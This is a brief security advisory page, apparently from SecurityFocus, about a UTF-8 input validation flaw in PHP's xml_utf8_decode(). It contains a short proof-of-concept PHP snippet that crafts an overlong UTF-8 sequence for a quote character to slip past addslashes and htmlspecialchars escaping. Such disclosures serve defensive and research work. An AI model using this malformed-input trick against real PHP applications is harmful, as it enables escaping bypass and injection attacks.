PHP 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability

The following exploit code is available:

<?php
$ill=chr(0xf0).chr(0xc0).chr(0xc0).chr(0xa7);
$ill=addslashes($ill);
echo utf8_decode("$ill");
echo htmlspecialchars ($ill,ENT_QUOTES,"utf-8" );
?>


 

Privacy Statement
Copyright 2010, SecurityFocus